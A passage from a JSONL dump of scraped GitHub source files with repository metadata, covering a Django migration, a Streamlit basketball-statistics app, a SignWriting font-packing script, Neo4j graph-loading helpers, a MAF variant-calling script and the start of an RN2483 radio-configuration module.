"z3c.wizard.interfaces.IWizard", "line_number": 18, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "72265256089", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContestSubmission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('run_id', models.CharField(max_length=191, blank=True)),\n ('compiler_id', models.CharField(max_length=191, blank=True)),\n ('send_error', models.TextField(null=True, blank=True)),\n ('got_verdict', models.BooleanField(default=False)),\n ('full_response', models.TextField(null=True, blank=True)),\n ('verdict', models.TextField(null=True, blank=True)),\n ('precompile_checks', models.TextField(null=True, blank=True)),\n ('compile_log', models.TextField(null=True, blank=True)),\n ('used_time', models.IntegerField(null=True, blank=True)),\n ('used_memory', models.IntegerField(null=True, blank=True)),\n ('error', models.TextField(null=True, blank=True)),\n ('message', models.TextField(null=True, blank=True)),\n ('test_number', models.IntegerField(null=True, blank=True)),\n ('create_time', models.DateTimeField(auto_now_add=True)),\n ('update_time', models.DateTimeField(auto_now=True)),\n ('sended_notify', models.BooleanField(default=False)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n", "repo_name": "znick/anytask", "sub_path": "anytask/anycontest/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "6132581893", "text": "\"\"\"Streamlit application to display a college basketball team's history\nfrom 1985-2020 seasons.\n\"\"\"\nimport streamlit as st\nimport pandas as pd\nimport altair as alt\nfrom db import get_db\nfrom st_functions import get_teams_list, is_ascending_rank\n\n# TODO cache data\n# TODO round fields\n\nif __name__ == \"__main__\":\n st.title(\"Explore a team's history in a variety of metrics!\")\n DB = get_db(config_file_name='docker_database.ini')\n\n # SEASONS = get_seasons_list(_db=DB)\n TEAMS = get_teams_list(_db=DB)\n TEAM = st.sidebar.selectbox(\"Select a team\", TEAMS)\n PREFIX = st.sidebar.selectbox(\"Select a prefix\", ['Tm', 'Opp'])\n PREFIX_LONGSTRING = 'Team' if PREFIX == 'Tm' else 'Opponent'\n OTHER_PREFIX = 'Opp' if PREFIX == 'Tm' else 'Tm'\n METRICS = ['PF', 'Margin',\n 'FGM', 'FGA',\n 'FG3M', 'FG3A',\n 'FG2M', 'FG2A',\n 'FTA', 'FTM',\n 'Ast', 'ORB',\n 'DRB', 'TRB',\n 'TO', 'Stl',\n 'Blk', 'Foul']\n METRIC = st.sidebar.selectbox(\"Select a metric\", METRICS)\n DENOM = st.sidebar.selectbox(\n 'Select a normalization', ['per40', 'perGame', 'perPoss']\n )\n DENOM_FIELD = 'Mins' if DENOM == 'per40' else DENOM[-4:]\n if DENOM == 'perPoss':\n DENOM_LONGSTRING = 'per possession'\n elif DENOM == 'per40':\n DENOM_LONGSTRING = 'per 40 mins'\n elif DENOM == 'perGame':\n DENOM_LONGSTRING = 'per Game'\n\n OA_BOOL = st.sidebar.checkbox(\"Opponent Adjust?\")\n OA_PREF = 'OA_' if OA_BOOL else ''\n OA_LONGSTRING = ' (opponent-adjusted)' if OA_BOOL else ''\n\n NORMALIZE_CONST = 40 if DENOM == 'per40' else 1\n\n # Get results from DB\n season_team_cursor = DB.seasonteams.find(\n {},\n {\n # Get OA metric fields\n PREFIX+METRIC: 1,\n PREFIX+DENOM_FIELD: 1,\n 'OppSum_'+OTHER_PREFIX+METRIC: 1,\n 'OppSum_'+OTHER_PREFIX+DENOM_FIELD: 1,\n # Get W/L record fields\n 'TmWin': 1,\n 'TmGame': 1,\n # Get required aggregate fields\n 'TmName': 1,\n 'Season': 1,\n '_id': 0\n }\n )\n season_team = pd.DataFrame(list(season_team_cursor))\n season_team['Season'] = season_team.Season.astype(str)\n\n # Opponent-adjust selected metric\n season_team[PREFIX+METRIC+DENOM] = season_team[PREFIX+METRIC] / season_team[PREFIX+DENOM_FIELD] * NORMALIZE_CONST\n season_team['OA_'+PREFIX+METRIC+DENOM] = \\\n (season_team[PREFIX+METRIC+DENOM]) - \\\n (\n (season_team['OppSum_'+OTHER_PREFIX+METRIC] - season_team[PREFIX+METRIC]) /\n (season_team['OppSum_'+OTHER_PREFIX+DENOM_FIELD] - season_team[PREFIX+DENOM_FIELD])\n ) * NORMALIZE_CONST\n\n # Determine team's regular-season record\n # TODO update with postseason games\n season_team['TmLoss'] = season_team['TmGame'] - season_team['TmWin']\n season_team['Record'] = season_team['TmWin'].map(str) + '-' + season_team['TmLoss'].map(str)\n\n # Rank each team's values within the season\n season_team['Rnk_'+OA_PREF+PREFIX+METRIC+DENOM] = season_team.groupby(\n 'Season'\n )[OA_PREF+PREFIX+METRIC+DENOM].rank(\n 'min', ascending=is_ascending_rank(PREFIX, METRIC)\n )\n\n # Create chart\n season_team_chart = season_team.loc[season_team.TmName == TEAM]\n TITLE_STRING = f\"{TEAM}: Rank of {PREFIX_LONGSTRING}'s {METRIC} {DENOM_LONGSTRING+OA_LONGSTRING} [1 is best]\"\n chart = alt.Chart(\n data=season_team_chart, \n title=TITLE_STRING\n ).mark_line(\n point=True\n ).encode(\n alt.X('Season'),\n alt.Y('Rnk_'+OA_PREF+PREFIX+METRIC+DENOM,\n scale=alt.Scale(domain=(353,1)),\n axis=alt.Axis(title='Rank')),\n tooltip=['Season',\n 'Record', \n OA_PREF+PREFIX+METRIC+DENOM, \n 'Rnk_'+OA_PREF+PREFIX+METRIC+DENOM]\n ).interactive()\n\n st.altair_chart(chart)\n", "repo_name": "ryanofarrell/ncaa-basketball", "sub_path": "code/streamlit/st_team_history.py", "file_name": "st_team_history.py", "file_ext": "py", "file_size_in_byte": 3969, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.title", "line_number": 14, "usage_type": "call"}, {"api_name": "db.get_db", "line_number": 15, "usage_type": "call"}, {"api_name": "st_functions.get_teams_list", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 19, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 20, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 32, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 33, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "st_functions.is_ascending_rank", "line_number": 89, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 95, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 101, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 102, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 103, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.altair_chart", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "20951794574", "text": "import sys\nimport os\nfrom time import gmtime, strftime\nimport re\nimport base64\nimport argparse\nimport glob\n\n##################\n# Argument Setup\n##################\nparser = argparse.ArgumentParser(description=\"SignWriting 2010 packing script takes a directory of files and writes a single data file.\"\n\t,epilog=\"Source SVG and completed TTF available online https://github.com/slevinski/signwriting_2010_fonts\")\nparser.add_argument(\"directory\", nargs=\"?\", help=\"name of the sub-directory in sources for the subfont files\")\nparser.add_argument(\"-f\",\"--force\", help=\"overwrite existing font files\", action=\"store_true\")\nparser.add_argument(\"-n\",\"--name\", metavar=\"filename\", help=\"name of data file\")\nparser.add_argument(\"-m\",\"--minimize\", metavar=\"factor\", help=\"for SVG, minimization factor for coordinate space\")\nparser.add_argument(\"-p\",\"--precision\", help=\"for SVG, number of decimal places for rounding\", default=\"NA\")\nparser.add_argument(\"-s\",\"--simplify\", help=\"for SVG, remove extra text\", action=\"store_true\")\nparser.add_argument(\"-t\",\"--test\", help=\"write one example to the screen\", action=\"store_true\")\nparser.add_argument(\"-r\",\"--reserved\", default=\"SignWriting 2010\", help=\"Reserved Font Name, default of %(default)s\")\n\nargs = parser.parse_args()\n\n\n\n##################\n# # initializing\n##################\nsourceDir = \"../source/\"\n\nif not args.directory:\n\tdirectories = os.walk( os.path.join(sourceDir,'.')).next()[1]\n\tdirectories.remove('other_svg')\n\tdirectories.remove('templates')\n\tif not len(directories):\n\t\tprint(\"\")\n\t\tprint(\"FAILURE: no directory available for packing \" + sourceDir)\n\telse:\n\t\tprint()\n\t\tprint(\"Please specify a directory from \" + sourceDir)\n\n\t\tfor dir in directories:\n\t\t\tprint(\"python pack.py \" + dir)\n\tsys.exit()\n\nfontDir = sourceDir + args.directory + \"/\"\nif args.name:\n\targs.directory = args.name\n\next = (args.directory[:3]).lower()\n\ndataFile = sourceDir + args.directory + \".dat\"\n\nif os.path.exists(dataFile) and not args.test:\n\tif args.force:\n\t\tprint(\"Overwriting data file \" + dataFile)\n\telse:\n\t\tprint()\n\t\tprint(\"FAILURE: Data file already exists: \" + dataFile)\n\t\tprint(\"Move file or use -f to force the file creation\")\n\t\tprint()\n\t\tsys.exit(-1)\n\nif os.path.exists(fontDir):\n\tprint(\"input directory \" + fontDir)\n\tprint(\"output data file \" + dataFile)\nelse:\n\tprint(f\"FAILURE: directory {fontDir} does not exist\")\n\tsys.exit(-1)\n\nif not args.test:\n\tsys.stdout = open(dataFile,'w') #redirect all prints to this log file\n\nprint(\"# SignWriting 2010 is released under the SIL Open Font License, Version 1.1.\")\nprint(\"# http://scripts.sil.org/OFL\")\nprint(\"#\")\nprint(\"# This Font Software is Copyright (c) 1974-2014\")\nprint(\"# Center For Sutton Movement Writing, Inc.\")\nprint(\"#\")\nprint(\"# The symbols of SignWriting 2010 were designed by Valerie Sutton (sutton@signwriting.org),\")\nprint(\"#\\t inventor of the SignWriting Script\")\nprint(\"#\")\nprint(\"# The symbol images were refined by Adam Frost (frost@signwriting.org).\")\nprint(\"#\")\nprint(\"# The symbols were encoded, transformed, and refactored by Stephen E Slevinski Jr (slevin@signpuddle.net).\")\nprint(\"#\")\nprint(\"# Reserved Font Name: \" + args.reserved)\nprint(\"#\")\nprint(\"# SignWriting 2010 Packed Data\")\nprint(\"# ------------------------------------\")\nprint(\"#\\tinput directory: \" + args.directory)\nprint(\"#\\toutput data file: \" + dataFile.replace(sourceDir,\"\"))\nprint(\"#\\tprocessed: \" + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\nprint(\"# ------------------------------------\")\nprint(\"# https://github.com/slevinski/signwriting_2010_tools\")\nprint(\"#\")\nprint(\"# created with command:\",)\nfor item in sys.argv:\n\tif \" \" in item:\n\t\tprint(f'\"{item}\"')\n\telse:\n\t\tprint(item)\nprint()\nprint(\"#\")\nfiles = glob.glob(fontDir + \"*\" + ext)\nfor file in files:\n\tname = file.split('/')[-1].split('.')[0]\n\twith open(file, \"rb\") as image_file:\n\t\tdata = image_file.read()\n\t\tif not ext==\"svg\":\n\t\t\tencoded_string = base64.b64encode(data)\n\t\t\tprint(name + \"\\t\" + encoded_string)\n\t\telse:\n\t\t\t#cleanup for various svg sources\n\t\t\tdata = data.replace(\"\\n\",\" \")\n\t\t\tstart = data.index(\"\", start)+4\n\t\t\tglines = data[start:end]\n\t\t\tif args.precision != \"NA\":\n\t\t\t\tglines = re.sub(r'\\.[0-9]+',\n\t\t\t\tlambda m: ((\"%.\" + args.precision + \"f\") % float(m.group().strip()))[1:],\n\t\t\t\tglines).replace(\".\" + \"0\"*int(args.precision),\"\")\n\t\t\tif args.simplify:\n\t\t\t\tglines = glines.replace(' fill=\"#000000\" stroke=\"none\"',\"\")\n\t\t\tif args.minimize:\n\t\t\t\tstart = glines.index(\"translate(\")\n\t\t\t\tend = glines.index(\")\", start)+1\n\t\t\t\ttranslate =glines[start:end]\n\t\t\t\tstart = translate.index(\"(\")+1\n\t\t\t\tend = translate.index(\",\", start)\n\t\t\t\ttransx =int(translate[start:end])/int(args.minimize)\n\t\t\t\tstart = translate.index(\",\")+1\n\t\t\t\tend = translate.index(\")\", start)\n\t\t\t\ttransy =int(translate[start:end])/int(args.minimize)\n\t\t\t\tglines = glines.replace(translate,\"translate(\" + str(transx) + \",\" + str(transy) + \")\")\n\n\t\t\t\tstart = glines.index(\"scale(\")\n\t\t\t\tend = glines.index(\")\", start)+1\n\t\t\t\tscale =glines[start:end]\n\t\t\t\tstart = scale.index(\"(\")+1\n\t\t\t\tend = scale.index(\",\", start)\n\t\t\t\tscalex =float(scale[start:end])/int(args.minimize)\n\t\t\t\tstart = scale.index(\",\")+1\n\t\t\t\tend = scale.index(\")\", start)\n\t\t\t\tscaley =float(scale[start:end])/int(args.minimize)\n\t\t\t\tglines=glines.replace(scale,\"scale(\" + str(scalex) + \",\" + str(scaley) + \")\")\n\n\t\t\tprint(name + \"\\t\" + glines)\n\t\tif args.test:\n\t\t\tsys.exit()\n", "repo_name": "Slevinski/signwriting_2010_tools", "sub_path": "tools/pack.py", "file_name": "pack.py", "file_ext": "py", "file_size_in_byte": 5354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 94, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 99, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 106, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 112, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 151, "usage_type": "call"}]}
+{"seq_id": "20490580711", "text": "\n# coding: utf-8\n\n\nfrom py2neo import Graph, Node, Relationship, GraphService\nimport os\nfrom tqdm import tqdm\nimport re\n\nNEO4J_USER = 'neo4j'\nNEO4J_PASSWORD = '123456'\nNEO4J_HOST = 'localhost'\n\n\nclass NeoGraph:\n def __init__(self, gcp=None):\n if gcp:\n #self.g = Graph('bolt://neo4j:123456@35.230.134.163:7687')\n self.g = Graph(host=gcp['NEO4J_HOST'], port=gcp['NEO4J_PORT'], user=gcp['NEO4J_USER'],\n password=gcp['NEO4J_PASSWORD'])\n else:\n self.g = Graph(host=NEO4J_HOST, user=NEO4J_USER,\n password=NEO4J_PASSWORD)\n\n def truncate(self):\n \"\"\"Remove all nodes in the graph\"\"\"\n print(\"----- Truncating graph -----\")\n tx = self.g.begin()\n result = tx.run('MATCH (n) DETACH DELETE n')\n tx.commit()\n return result\n\n def add_companies(self, df):\n print(\"----- Starting Add companies process -----\")\n tx = self.g.begin()\n for _, x in tqdm(df.iterrows(), total=len(df)):\n if x['ticker'] != \"NA\":\n n = Node(\"Ticker\", name=x['ticker'], company=x['name'],\n sector=x['sector'], variation_coefficient=x['var_coef'])\n tx.create(n)\n tx.commit()\n self.g.run(\"CREATE INDEX ON :Ticker(name)\")\n print(\"----- Add companies process complete -----\")\n\n def create_links(self, df):\n print(\"----- Starting relationship creation process -----\")\n for _, x in tqdm(df.iterrows(), total=df.shape[0]):\n cypher = f\"MATCH (s1:Ticker {{name:\\'{x['ticker1']}\\'}}),(s2:Ticker {{name:\\'{x['ticker2']}\\'}}) CREATE (s1)-[:CORR {{corr : {x['cor']}, id : '{x['id']}'}}]->(s2)\"\n self.g.run(cypher)\n print(\"-----Relationship creation process complete -----\")\n\n def add_tickers(self, df):\n print(\"----- Starting Add companies process -----\")\n tx = self.g.begin()\n for _, x in tqdm(df.iterrows(), total=len(df)):\n\n n = Node(\"Ticker\", ticker=x['ticker'], company=x['name'],\n sector=x['sector'], )\n tx.create(n)\n tx.commit()\n self.g.run(\"CREATE INDEX ON :Ticker(ticker)\")\n print(\"----- Add companies process complete -----\")\n\n def add_funds(self, df):\n print(\"----- Starting Add Funds process -----\")\n tx = self.g.begin()\n for _, x in tqdm(df.iterrows(), total=len(df)):\n\n n = Node(\"Fund\", name=x['name'])\n tx.create(n)\n tx.commit()\n print(\"----- Add Funds process complete -----\")\n\n def link_funds_to_tickers(self, funds_tickers):\n print(\"----- Starting relationship creation process -----\")\n for fund in tqdm(funds_tickers, total=len(funds_tickers)):\n print(fund)\n for x in funds_tickers[fund]:\n if x['TICKER'] and x['VALUE'] > 0:\n\n if re.sub('[^a-zA-Z]+', '', x['PUT/CALL']):\n pc = re.sub('[^a-zA-Z]+', '',\n x['PUT/CALL']).upper()\n cypher = f\"MATCH (f1:Fund {{name:\\'{fund}\\'}}),(t1:Ticker {{ticker:\\'{x['TICKER']}\\'}}) CREATE (f1)-[:INVESTMENT {{valuex$1000 : {x['VALUE']}, shares : {x['SHARES']}, put_call : '{pc}'}}]->(t1)\"\n else:\n cypher = f\"MATCH (f1:Fund {{name:\\'{fund}\\'}}),(t1:Ticker {{ticker:\\'{x['TICKER']}\\'}}) CREATE (f1)-[:INVESTMENT {{valuex$1000 : {x['VALUE']}, shares : {x['SHARES']}}}]->(t1)\"\n try:\n self.g.run(cypher)\n except:\n print(\"Failed \", fund, x)\n print(\"-----Relationship creation process complete -----\")\n", "repo_name": "DL4L/13F-Network", "sub_path": "neo4j_funcs.py", "file_name": "neo4j_funcs.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "py2neo.Graph", "line_number": 19, "usage_type": "call"}, {"api_name": "py2neo.Graph", "line_number": 22, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 36, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 47, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 55, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 57, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 69, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 76, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "14595206216", "text": "#!/usr/bin/env python3\n\"\"\"\n Get table of allele presence/absence from an MAF file.\n\"\"\"\n\nimport argparse\nimport collections\nimport gzip\nimport itertools\nimport sys\n\nMafSeq = collections.namedtuple('MafSeq', 'seq_name start aligned_bases strand contig_length seq')\n\ndef parse_maf_haplotypes(ih):\n record = {'a':{}, 'haplotypes':collections.defaultdict(set),\n 'strain_count':collections.defaultdict(int)}\n for line in ih:\n if line.startswith('a'):\n if len(record['haplotypes']) > 0:\n yield record\n record = {'a':{}, 'haplotypes':collections.defaultdict(set),\n 'strain_count':collections.defaultdict(int)}\n record['a'] = {x.split('=')[0]:x.split('=')[1] for x in line.strip().split()[1:]}\n elif line.startswith('s'):\n fields = line.strip().split()[1:]\n strain = fields[0].split('.')[0]\n record['strain_count'][strain] += 1\n record['haplotypes'][fields[5]].add(strain)\n else:\n continue\n yield record\n\ndef get_vars_from_haplotypes(haplotypes):\n h = list(haplotypes.items())\n l = len(h[0][0])\n ret = {}\n\n ## First find SNPs\n snps = []\n for i in range(l):\n alleles = collections.defaultdict(set)\n for j in range(len(h)):\n b = (h[j][0][i]).upper()\n if b not in {'A', 'T', 'C', 'G'}:\n continue\n alleles[b].add(j)\n if len(alleles) > 1:\n for a, idxs in alleles.items():\n snps.append((str(i) + '-' + a, idxs))\n ret[str(i+1) + '-' + a + '-snp'] = set()\n for j in idxs:\n for s in h[j][1]:\n ret[str(i+1) + '-' + a + '-snp'].add(s)\n\n ## Then find indels\n indels = collections.defaultdict(set)\n for j in range(len(h)):\n d = False\n s = None\n e = None\n for i in range(l):\n b = (h[j][0][i])\n if (b != '-' or i == l-1) and d:\n e = i\n if e == l-1: e +=1\n indels[(s+1, e)].add(j)\n d = False\n elif b == '-' and not d:\n s = i\n d = True\n\n ## Produce output table\n for se, idxs in sorted(indels.items()):\n drs = '_'.join(map(str, se)) + '-del'\n irs = '_'.join(map(str, se)) + '-ins'\n ret[drs] = set()\n ret[irs] = set()\n done = set()\n for j in idxs:\n done.add(j)\n for s in h[j][1]:\n ret[drs].add(s)\n for j in range(len(h)):\n if j not in done:\n for s in h[j][1]:\n ret[irs].add(s)\n\n return ret\n\n\n\nparser = argparse.ArgumentParser(usage=__doc__)\nparser.add_argument('maf')\nparser.add_argument('strains')\nargs = parser.parse_args()\n\n\nstrains = []\nwith open(args.strains, 'rt') as h:\n for line in h:\n strains.append(line.strip())\n\nsys.stdout.write('contig\\tpos\\trs\\t' + '\\t'.join(strains) + '\\n')\nopen_fun = open\nif args.maf.endswith('.gz'):\n open_fun = gzip.open\nwith open_fun(args.maf, 'rt') as ih:\n for record in parse_maf_haplotypes(ih):\n var_table = get_vars_from_haplotypes(record['haplotypes'])\n for rs, strain_list in var_table.items():\n sys.stdout.write(record['a']['label'] + '\\t' +\n rs.split('-')[0] + '\\t' +\n record['a']['label'] + '-' + rs)\n for strain in strains:\n if strain in strain_list:\n sys.stdout.write('\\t1')\n else:\n sys.stdout.write('\\t0')\n sys.stdout.write('\\n')\n sys.stdout.write(record['a']['label'] + '\\t' +\n '0' + '\\t' +\n record['a']['label'] + '-copynumber')\n for strain in strains:\n sys.stdout.write('\\t' + str(record['strain_count'][strain]))\n sys.stdout.write('\\n')\n", "repo_name": "brendane/asymmetric_selection_manuscript_code_for_review", "sub_path": "ensifer_variants/helper_scripts/variants_from_maf.py", "file_name": "variants_from_maf.py", "file_ext": "py", "file_size_in_byte": 3985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 21, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 56, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 103, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 124, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 125, "usage_type": "attribute"}]}
+{"seq_id": "36172664618", "text": "# Contains the logic for unpacking user configuration file\n__author__ = \"Matteo Golin\"\n\n# Imports\nimport json\nfrom dataclasses import dataclass, field\nfrom enum import StrEnum\nfrom typing import Any, Self\n\n# Constants (note that trailing +1 is for inclusivity in range() object)\nPOWER_RANGE: tuple[int, int] = (-3, 16 + 1)\nVALID_SPREADING_FACTORS: list[int] = [7, 8, 9, 10, 11, 12]\nVALID_BANDWIDTHS: list[int] = [125, 250, 500]\nSYNC_RANGE: tuple[int, int] = (0, 256 + 1)\nPREAMBLE_RANGE: tuple[int, int] = (0, 65_535 + 1)\nLF_RANGE: tuple[int, int] = (433_050_000, 434_790_000 + 1)\nHF_RANGE: tuple[int, int] = (863_000_000, 870_000_000 + 1)\n\n# Types\nJSON = dict[str, Any]\n\n\nclass ModulationModes(StrEnum):\n \"\"\"Modulation types for the RN2483 radio.\"\"\"\n\n LORA = \"lora\"\n FSK = \"fsk\"\n\n\nclass CodingRates(StrEnum):\n \"\"\"Coding rates for the RN2483 radio.\"\"\"\n\n FOUR_FIFTHS = \"4/5\"\n FOUR_SIXTHS = \"4/6\"\n FOUR_SEVENTHS = \"4/7\"\n FOUR_EIGHTS = \"4/8\"\n\n\n@dataclass\nclass RadioParameters:\n\n \"\"\"\n Represents a collection of parameters for the RN2483 radio settings.\n\n modulation: The modulation type.\n frequency: The frequency in 